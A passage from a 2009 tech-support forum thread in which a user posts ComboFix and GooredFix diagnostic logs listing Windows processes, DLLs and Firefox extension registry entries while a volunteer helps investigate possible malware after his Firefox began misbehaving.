    "ImagePath "= "\ "d:\program files\MySQL\MySQL Server 5.1\bin\mysqld\" --defaults-file=\ "d:\program files\MySQL\MySQL Server 5.1\my.ini\" MySQL "
    .
    --------------------- DLLs Loaded Under Running Processes ---------------------

    - - - - - - - > 'explorer.exe'(2680)
    c:\program files\McAfee\SiteAdvisor\saHook.dll
    c:\windows\system32\IKEYRFK8.DLL
    .
    ------------------------ Other Running Processes ------------------------
    .
    c:\program files\A4TECH\KEYBOARD\IKEYMAIN.EXE
    c:\program files\AVG\AVG8\AVGTRAY.EXE
    c:\program files\AVG\AVG8\AVGWDSVC.EXE
    c:\program files\BONJOUR\MDNSRESPONDER.EXE
    c:\program files\JAVA\JRE6\BIN\JQS.EXE
    c:\program files\MICROSOFT ACTIVESYNC\RAPIMGR.EXE
    c:\program files\MCAFEE\MSC\MCMSCSVC.EXE
    c:\program files\COMMON FILES\MCAFEE\MNA\MCNASVC.EXE
    c:\program files\AVG\AVG8\AVGRSX.EXE
    c:\progra~1\AVG\AVG8\avgnsx.exe
    c:\program files\COMMON FILES\MCAFEE\MCPROXY\MCPROXY.EXE
    c:\program files\MCAFEE\VIRUSSCAN\MCSHIELD.EXE
    c:\program files\COMMON FILES\MICROSOFT SHARED\VS7DEBUG\MDM.EXE
    c:\program files\MCAFEE\MPF\MPFSRV.EXE
    c:\program files\MCAFEE\MSK\MSKSRVER.EXE
    d:\program files\MySQL\MySQL Server 5.1\bin\mysqld.exe
    c:\program files\Spyware Terminator\sp_rsser.exe
    c:\program files\Skype\Plugin Manager\skypePM.exe
    c:\windows\system32\wscntfy.exe
    c:\program files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe
    c:\progra~1\McAfee\VIRUSS~1\mcsysmon.exe
    .
    **************************************************************************
    .
    Completion time: 2009-04-13 9:40 - machine was rebooted
    ComboFix-quarantined-files.txt 2009-04-13 04:40
    ComboFix2.txt 2009-04-12 16:10
    ComboFix3.txt 2008-12-06 11:49
    ComboFix4.txt 2008-12-03 11:25

    Pre-Run: 8,971,190,272 bytes free
    Post-Run: 8,905,490,432 bytes free

    206 --- E O F --- 2009-01-11 06:39
     
  19. 2009/04/12
    zeeshanhashmi

    zeeshanhashmi Inactive Thread Starter

    Joined:
    2008/01/13
    Messages:
    77
    Likes Received:
    0
    Hello Geri,

    Another strange issue I have observed since I downloaded and ran ComboFix: Firefox (the browser I always use) now runs abnormally. Sometimes it loads the page, and sometimes it just does not load anything and shows the same page; for example, if I click on any link on a page, it just does nothing.

    I searched and got this link.
    http://forums.majorgeeks.com/showthread.php?t=155615

    Is it anything related to ComboFix?
     
  20. 2009/04/15
    Geri Lifetime Subscription

    Geri Inactive Alumni

    Joined:
    2003/03/02
    Messages:
    4,580
    Likes Received:
    7
    Hi
    Sorry for the wait, I had a storm go through and I lost my internet.

    I don't believe that is the problem, I've not seen alerts on that from the developer of CF.

    Please do this.

    Please download GooredFix and save it to your Desktop. Double-click Goored.exe to run it. Select 1. Find Goored (no fix) by typing 1 and pressing Enter. A log will open, please post the contents of that log in your next reply (it can also be found on your desktop, called Goored.txt). Note: Do not run Option #2 yet.

    Thanks
    Geri
     
  21. 2009/04/16
    zeeshanhashmi

    zeeshanhashmi Inactive Thread Starter

    Joined:
    2008/01/13
    Messages:
    77
    Likes Received:
    0
    Here is the log:

    GooredFix v1.92 by jpshortstuff
    Log created at 13:17 on 16/04/2009 running Option #1 (Zeeshan Hashmi)
    Firefox version 3.0.8 (en-US)

    =====Suspect Goored Entries=====

    =====Dumping Registry Values=====

    [HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox 3.0.8\extensions]
    "Plugins "= "C:\Program Files\Mozilla Firefox\plugins "

    [HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox 3.0.8\extensions]
    "Components "= "C:\Program Files\Mozilla Firefox\components "

    [HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Firefox\extensions]
    "{3f963a5b-e555-4543-90e2-c3908898db71} "= "C:\Program Files\AVG\AVG8\Firefox "

    [HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Firefox\extensions]
    "jqs@sun.com "= "C:\Program Files\Java\jre6\lib\deploy\jqs\ff "

    [HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Firefox\extensions]
    "{B7082FAA-CB62-4872-9106-E42DD88EDE45} "= "C:\Program Files\McAfee\SiteAdvisor "

    [HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Firefox\extensions]
    "{1650a312-02bc-40ee-977e-83f158701739} "= "C:\Program Files\SiteAdvisor\FF1 "
     
